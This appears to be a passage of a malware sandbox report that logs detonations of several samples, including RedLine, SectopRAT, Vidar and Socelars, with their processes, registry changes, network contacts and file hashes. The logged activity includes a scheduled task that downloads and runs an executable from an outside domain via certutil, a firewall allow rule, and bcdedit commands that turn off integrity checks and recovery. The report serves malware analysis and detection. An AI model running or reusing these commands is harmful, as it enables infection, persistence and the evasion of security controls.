| Set value (data) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 19000000010000001000000014c3bd3549ee225aece13734ad8ca0b80f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a3030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a41400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f392000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f76ee3c8dc45d565ba2d9666eb33537e532b6 | C:\Windows\rss\csrss.exe | N/A |
| Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4 | C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe | N/A |
Scheduled Task/Job: Scheduled Task
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
| N/A | N/A | C:\Windows\system32\schtasks.exe | N/A |
Suspicious behavior: EnumeratesProcesses
Suspicious behavior: LoadsDriver
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\app.exe | N/A |
| Token: SeImpersonatePrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\app.exe | N/A |
| Token: SeSystemEnvironmentPrivilege | N/A | C:\Windows\rss\csrss.exe | N/A |
Suspicious use of WriteProcessMemory
Uses Task Scheduler COM API
Processes
C:\Users\Admin\AppData\Local\Temp\app.exe
"C:\Users\Admin\AppData\Local\Temp\app.exe"
C:\Windows\system32\makecab.exe
"C:\Windows\system32\makecab.exe" C:\Windows\Logs\CBS\CbsPersist_20241108014114.log C:\Windows\Logs\CBS\CbsPersist_20241108014114.cab
C:\Users\Admin\AppData\Local\Temp\app.exe
"C:\Users\Admin\AppData\Local\Temp\app.exe"
C:\Windows\system32\cmd.exe
C:\Windows\Sysnative\cmd.exe /C "netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes"
C:\Windows\system32\netsh.exe
netsh advfirewall firewall add rule name="csrss" dir=in action=allow program="C:\Windows\rss\csrss.exe" enable=yes
C:\Windows\rss\csrss.exe
C:\Windows\rss\csrss.exe ""
C:\Windows\system32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /TR "C:\Windows\rss\csrss.exe" /TN csrss /F
C:\Windows\system32\schtasks.exe
schtasks /CREATE /SC ONLOGON /RL HIGHEST /RU SYSTEM /TR "cmd.exe /C certutil.exe -urlcache -split -f https://spolaect.info/app/app.exe C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe && C:\Users\Admin\AppData\Local\Temp\csrss\scheduled.exe /31340" /TN ScheduledUpdate /F
C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
"C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe"
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -create {71A3C7FC-F751-4982-AEC1-E958357E6813} -d "Windows Fast Mode" -application OSLOADER
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} device partition=C:
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} osdevice partition=C:
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} systemroot \Windows
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} path \Windows\system32\osloader.exe
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} kernel ntkrnlmp.exe
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} recoveryenabled 0
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nx OptIn
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} nointegritychecks 1
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -set {71A3C7FC-F751-4982-AEC1-E958357E6813} inherit {bootloadersettings}
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -displayorder {71A3C7FC-F751-4982-AEC1-E958357E6813} -addlast
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -timeout 0
C:\Windows\system32\bcdedit.exe
C:\Windows\system32\bcdedit.exe -default {71A3C7FC-F751-4982-AEC1-E958357E6813}
C:\Windows\system32\bcdedit.exe
C:\Windows\Sysnative\bcdedit.exe /v
C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
C:\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe taskmgr.exe C:\Users\Admin\AppData\Local\Temp\csrss\injector\NtQuerySystemInformationHook.dll
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | ninhaine.com | udp |
| US | 8.8.8.8:53 | 2makestorage.com | udp |
| US | 8.8.8.8:53 | nisdably.com | udp |
| US | 8.8.8.8:53 | fc7c8b37-35d9-479d-8e07-117f8901003f.ninhaine.com | udp |
| US | 8.8.8.8:53 | server6.ninhaine.com | udp |
| CZ | 46.8.8.100:443 | server6.ninhaine.com | tcp |
| CZ | 46.8.8.100:443 | server6.ninhaine.com | tcp |
| US | 8.8.8.8:53 | ww82.ninhaine.com | udp |
| US | 199.59.243.227:80 | ww82.ninhaine.com | tcp |
| US | 199.59.243.227:80 | ww82.ninhaine.com | tcp |
| US | 8.8.8.8:53 | msdl.microsoft.com | udp |
| US | 204.79.197.219:443 | msdl.microsoft.com | tcp |
| US | 8.8.8.8:53 | vsblobprodscussu5shard30.blob.core.windows.net | udp |
| US | 20.150.38.228:443 | vsblobprodscussu5shard30.blob.core.windows.net | tcp |
| US | 8.8.8.8:53 | vsblobprodscussu5shard20.blob.core.windows.net | udp |
| US | 20.150.70.36:443 | vsblobprodscussu5shard20.blob.core.windows.net | tcp |
| CZ | 46.8.8.100:443 | server6.ninhaine.com | tcp |
| US | 199.59.243.227:80 | ww82.ninhaine.com | tcp |
| US | 8.8.8.8:53 | spolaect.info | udp |
| CZ | 46.8.8.100:443 | server6.ninhaine.com | tcp |
| US | 199.59.243.227:80 | ww82.ninhaine.com | tcp |
| CZ | 46.8.8.100:443 | server6.ninhaine.com | tcp |
| US | 199.59.243.227:80 | ww82.ninhaine.com | tcp |
Files
memory/2156-0-0x00000000039E0000-0x0000000003E1C000-memory.dmp
memory/2156-1-0x00000000039E0000-0x0000000003E1C000-memory.dmp
memory/2156-2-0x0000000003E20000-0x0000000004746000-memory.dmp
memory/2156-3-0x0000000000400000-0x0000000000D41000-memory.dmp
memory/2156-8-0x0000000000400000-0x0000000000D41000-memory.dmp
memory/2156-7-0x0000000003E20000-0x0000000004746000-memory.dmp
memory/2156-6-0x00000000039E0000-0x0000000003E1C000-memory.dmp
memory/2156-4-0x0000000000400000-0x00000000021A3000-memory.dmp
memory/2796-5-0x0000000003C00000-0x000000000403C000-memory.dmp
memory/2796-9-0x0000000000400000-0x00000000021A3000-memory.dmp
memory/2796-10-0x0000000000400000-0x00000000021A3000-memory.dmp
\Windows\rss\csrss.exe
| MD5 | d3f680a40104a2bf44d1e55ab22cc283 |
| SHA1 | 3e44293bd666ee6842f27001e561442203479698 |
| SHA256 | a5d0a8eb93516f6979ce8da08a5750bf7f0f0fc98a969cd9e5b175dd29302a86 |
| SHA512 | 478c308a40b3da9697ef9925e3d8c375bdc9a51d17d401fdf947f1e9ec7b4b5b59d5aa6e5ab0857825f5dbcb398a1cfffe33f972b6841d2916329f2e2358510b |
memory/2980-19-0x0000000003D30000-0x000000000416C000-memory.dmp
memory/2796-21-0x0000000000400000-0x00000000021A3000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe
| MD5 | 13aaafe14eb60d6a718230e82c671d57 |
| SHA1 | e039dd924d12f264521b8e689426fb7ca95a0a7b |
| SHA256 | f44a7deb678ae7bbaaadf88e4c620d7cdf7e6831a1656c456545b1c06feb4ef3 |
| SHA512 | ade02218c0fd1ef9290c3113cf993dd89e87d4fb66fa1b34afdc73c84876123cd742d2a36d8daa95e2a573d2aa7e880f3c8ba0c5c91916ed15e7c4f6ff847de3 |
memory/1652-28-0x0000000140000000-0x00000001405E8000-memory.dmp
\Users\Admin\AppData\Local\Temp\dbghelp.dll
| MD5 | f0616fa8bc54ece07e3107057f74e4db |
| SHA1 | b33995c4f9a004b7d806c4bb36040ee844781fca |
| SHA256 | 6e58fcf4d763022b1f79a3c448eb2ebd8ad1c15df3acf58416893f1cbc699026 |
| SHA512 | 15242e3f5652d7f1d0e31cebadfe2f238ca3222f0e927eb7feb644ab2b3d33132cf2316ee5089324f20f72f1650ad5bb8dd82b96518386ce5b319fb5ceb8313c |
\Users\Admin\AppData\Local\Temp\symsrv.dll
| MD5 | 5c399d34d8dc01741269ff1f1aca7554 |
| SHA1 | e0ceed500d3cef5558f3f55d33ba9c3a709e8f55 |
| SHA256 | e11e0f7804bfc485b19103a940be3d382f31c1378caca0c63076e27797d7553f |
| SHA512 | 8ff9d38b22d73c595cc417427b59f5ca8e1fb7b47a2fa6aef25322bf6e614d6b71339a752d779bd736b4c1057239100ac8cc62629fd5d6556785a69bcdc3d73d |
\Users\Admin\AppData\Local\Temp\ntkrnlmp.exe
| MD5 | 1afff8d5352aecef2ecd47ffa02d7f7d |
| SHA1 | 8b115b84efdb3a1b87f750d35822b2609e665bef |
| SHA256 | c41acc53cde89b94d55d6932ddd55a212ba910e1fade3da138670bb5b18ae4e1 |
| SHA512 | e5dc54c60be702e11772dc729eec5ec7140f293545aa3d57282adacddf686483393b0c940bbd397a9d50a6cda093865b143ae00c51ce3bf5d6b00241f97b3cdb |
memory/1652-41-0x0000000140000000-0x00000001405E8000-memory.dmp
memory/2980-53-0x0000000000400000-0x00000000021A3000-memory.dmp
memory/2980-65-0x0000000000400000-0x00000000021A3000-memory.dmp
memory/2980-69-0x0000000000400000-0x00000000021A3000-memory.dmp
C:\Users\Admin\AppData\Local\Temp\Symbols\ntkrnlmp.pdb\AAF33CF37E194E98957768CF9C02DE8E2\download.error
| MD5 | fd2727132edd0b59fa33733daa11d9ef |
| SHA1 | 63e36198d90c4c2b9b09dd6786b82aba5f03d29a |
| SHA256 | 3a72dbedc490773f90e241c8b3b839383a63ce36426a4f330a0f754b14b4d23e |
| SHA512 | 3e251be7d0e8db92d50092a4c4be3c74f42f3d564c72981f43a8e0fe06427513bfa0f67821a61a503a4f85741f0b150280389f8f4b4f01cdfd98edce5af29e6e |
C:\Users\Admin\AppData\Local\Temp\osloader.exe
| MD5 | e2f68dc7fbd6e0bf031ca3809a739346 |
| SHA1 | 9c35494898e65c8a62887f28e04c0359ab6f63f5 |
| SHA256 | b74cd24cef07f0226e7b777f7862943faee4cf288178b423d5344b0769dc15d4 |
| SHA512 | 26256a12b5b8b3a40b34f18e081cdb45ea11845589c9d458a79385a4b8178f32164b417ddc9346fab8299bc6d4b9fedb620274c4edf9321424f37a2e2a6de579 |
C:\Users\Admin\AppData\Local\Temp\Symbols\winload_prod.pdb\768283CA443847FB8822F9DB1F36ECC51\download.error
| MD5 | fafbf2197151d5ce947872a4b0bcbe16 |
| SHA1 | a86eaa2dd9fc6d36fcfb41df7ead8d1166aea020 |
| SHA256 | feb122b7916a1e62a7a6ae8d25ea48a2efc86f6e6384f5526e18ffbfc5f5ff71 |
| SHA512 | acbd49a111704d001a4ae44d1a071d566452f92311c5c0099d57548eddc9b3393224792c602022df5c3dd19b0a1fb4eff965bf038c8783ae109336699f9d13f6 |
\Users\Admin\AppData\Local\Temp\csrss\dsefix.exe
| MD5 | d98e78fd57db58a11f880b45bb659767 |
| SHA1 | ab70c0d3bd9103c07632eeecee9f51d198ed0e76 |
| SHA256 | 414035cc96d8bcc87ed173852a839ffbb45882a98c7a6f7b821e1668891deef0 |
| SHA512 | aafbd3eee102d0b682c4c854d69d50bac077e48f7f0dd8a5f913c6c73027aed7231d99fc9d716511759800da8c4f0f394b318821e9e47f6e62e436c8725a7831 |
memory/2980-98-0x0000000000400000-0x00000000021A3000-memory.dmp
memory/2980-100-0x0000000000400000-0x00000000021A3000-memory.dmp
\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe
| MD5 | d98e33b66343e7c96158444127a117f6 |
| SHA1 | bb716c5509a2bf345c6c1152f6e3e1452d39d50d |
| SHA256 | 5de4e2b07a26102fe527606ce5da1d5a4b938967c9d380a3c5fe86e2e34aaaf1 |
| SHA512 | 705275e4a1ba8205eb799a8cf1737bc8ba686925e52c9198a6060a7abeee65552a85b814ac494a4b975d496a63be285f19a6265550585f2fc85824c42d7efab5 |
memory/2980-106-0x0000000000400000-0x00000000021A3000-memory.dmp
memory/2980-107-0x0000000000400000-0x00000000021A3000-memory.dmp
memory/2980-108-0x0000000000400000-0x00000000021A3000-memory.dmp
memory/2980-109-0x0000000000400000-0x00000000021A3000-memory.dmp
memory/2980-110-0x0000000000400000-0x00000000021A3000-memory.dmp
memory/2980-111-0x0000000000400000-0x00000000021A3000-memory.dmp
memory/2980-112-0x0000000000400000-0x00000000021A3000-memory.dmp
memory/2980-113-0x0000000000400000-0x00000000021A3000-memory.dmp
memory/2980-114-0x0000000000400000-0x00000000021A3000-memory.dmp
Analysis: behavioral22
Detonation Overview
Submitted
2024-11-08 01:40
Reported
2024-11-08 01:43
Platform
win10v2004-20241007-en
Max time kernel
150s
Max time network
154s
Command Line
Signatures
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\jamesnew.exe | N/A |
Suspicious use of FindShellTrayWindow
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\jamesnew.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\jamesnew.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\jamesnew.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\jamesnew.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\jamesnew.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\jamesnew.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\jamesnew.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\jamesnew.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\jamesnew.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\jamesnew.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\jamesnew.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\jamesnew.exe | N/A |
Suspicious use of SendNotifyMessage
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\jamesnew.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\jamesnew.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\jamesnew.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\jamesnew.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\jamesnew.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\jamesnew.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\jamesnew.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\jamesnew.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\jamesnew.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\jamesnew.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\jamesnew.exe | N/A |
| N/A | N/A | C:\Users\Admin\AppData\Local\Temp\jamesnew.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\jamesnew.exe
"C:\Users\Admin\AppData\Local\Temp\jamesnew.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | bbaser2.webtm.ru | udp |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 72.209.201.84.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 138.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 200.163.202.172.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 75.117.19.2.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.214.232.199.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 68.209.201.84.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 22.236.111.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 199.111.78.13.in-addr.arpa | udp |
Files
Analysis: behavioral30
Detonation Overview
Submitted
2024-11-08 01:40
Reported
2024-11-08 01:43
Platform
win10v2004-20241007-en
Max time kernel
150s
Max time network
152s
Command Line
Signatures
RedLine
RedLine payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Redline family
SectopRAT
SectopRAT payload
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
Sectoprat family
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\redcloud.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\redcloud.exe
"C:\Users\Admin\AppData\Local\Temp\redcloud.exe"
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 8.8.8.8.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 133.211.185.52.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 172.210.232.199.in-addr.arpa | udp |
| NL | 95.211.185.27:42097 | tcp | |
| US | 8.8.8.8:53 | 133.32.126.40.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 209.205.72.20.in-addr.arpa | udp |
| NL | 95.211.185.27:42097 | tcp | |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 241.42.69.40.in-addr.arpa | udp |
| NL | 95.211.185.27:42097 | tcp | |
| US | 8.8.8.8:53 | 99.209.201.84.in-addr.arpa | udp |
| NL | 95.211.185.27:42097 | tcp | |
| NL | 95.211.185.27:42097 | tcp | |
| US | 8.8.8.8:53 | 69.209.201.84.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 19.229.111.52.in-addr.arpa | udp |
| NL | 95.211.185.27:42097 | tcp | |
| NL | 95.211.185.27:42097 | tcp | |
| NL | 95.211.185.27:42097 | tcp | |
| US | 8.8.8.8:53 | udp |
Files
memory/1748-0-0x000000007480E000-0x000000007480F000-memory.dmp
memory/1748-1-0x0000000000B60000-0x0000000000B90000-memory.dmp
memory/1748-2-0x0000000005BC0000-0x0000000006164000-memory.dmp
memory/1748-3-0x0000000006790000-0x0000000006DA8000-memory.dmp
memory/1748-4-0x0000000005730000-0x00000000057C2000-memory.dmp
memory/1748-5-0x00000000056E0000-0x00000000056F2000-memory.dmp
memory/1748-6-0x00000000058E0000-0x00000000059EA000-memory.dmp
memory/1748-7-0x0000000005830000-0x000000000586C000-memory.dmp
memory/1748-8-0x0000000074800000-0x0000000074FB0000-memory.dmp
memory/1748-9-0x0000000005B70000-0x0000000005BBC000-memory.dmp
memory/1748-10-0x000000007480E000-0x000000007480F000-memory.dmp
memory/1748-11-0x0000000074800000-0x0000000074FB0000-memory.dmp
Analysis: behavioral8
Detonation Overview
Submitted
2024-11-08 01:40
Reported
2024-11-08 01:43
Platform
win10v2004-20241007-en
Max time kernel
133s
Max time network
138s
Command Line
Signatures
Vidar
Vidar family
Vidar Stealer
| Description | Indicator | Process | Target |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
| N/A | N/A | N/A | N/A |
Program crash
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\Litever01.exe | N/A |
Processes
C:\Users\Admin\AppData\Local\Temp\Litever01.exe
"C:\Users\Admin\AppData\Local\Temp\Litever01.exe"
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 376 -p 216 -ip 216
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 216 -s 824
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 216 -ip 216
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 216 -s 864
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 216 -ip 216
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 216 -s 864
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 216 -ip 216
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 216 -s 888
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 216 -ip 216
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 216 -s 984
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 216 -ip 216
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 216 -s 1052
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 216 -ip 216
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 216 -s 1496
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 204 -p 216 -ip 216
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 216 -s 1544
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 204 -p 216 -ip 216
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 216 -s 1772
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 216 -ip 216
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 216 -s 1796
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 176 -p 216 -ip 216
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 216 -s 1564
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 216 -ip 216
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 216 -s 1628
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 528 -p 216 -ip 216
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 216 -s 1732
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 216 -ip 216
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 216 -s 1740
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 216 -ip 216
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 216 -s 1844
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 456 -p 216 -ip 216
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 216 -s 1812
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 484 -p 216 -ip 216
C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -u -p 216 -s 1848
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 58.55.71.13.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 98.208.201.84.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 75.159.190.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | eduarroma.tumblr.com | udp |
| US | 74.114.154.18:443 | eduarroma.tumblr.com | tcp |
| US | 8.8.8.8:53 | 18.154.114.74.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 233.38.18.104.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 50.23.12.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 171.39.242.20.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 73.209.201.84.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 67.209.201.84.in-addr.arpa | udp |
| US | 8.8.8.8:53 | 14.227.111.52.in-addr.arpa | udp |
Files
memory/216-1-0x0000000001DF0000-0x0000000001EF0000-memory.dmp
memory/216-2-0x0000000003A10000-0x0000000003AAD000-memory.dmp
memory/216-3-0x0000000000400000-0x00000000004A1000-memory.dmp
memory/216-13-0x0000000001DF0000-0x0000000001EF0000-memory.dmp
memory/216-15-0x0000000003A10000-0x0000000003AAD000-memory.dmp
memory/216-16-0x0000000000400000-0x00000000004A1000-memory.dmp
memory/216-14-0x0000000000400000-0x0000000001DCA000-memory.dmp
Analysis: behavioral16
Detonation Overview
Submitted
2024-11-08 01:40
Reported
2024-11-08 01:43
Platform
win10v2004-20241007-en
Max time kernel
149s
Max time network
152s
Command Line
Signatures
Socelars
Socelars family
Reads user/profile data of web browsers
Drops Chrome extension
| Description | Indicator | Process | Target |
| File created | C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\hemlmgggokggmncimchkllhcjcaimcle\9.86.66_0\manifest.json | C:\Users\Admin\AppData\Local\Temp\askinstall50.exe | N/A |
Legitimate hosting services abused for malware hosting/C2
| Description | Indicator | Process | Target |
| N/A | iplogger.org | N/A | N/A |
| N/A | iplogger.org | N/A | N/A |
Looks up geolocation information via web service
Browser Information Discovery
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Users\Admin\AppData\Local\Temp\askinstall50.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\cmd.exe | N/A |
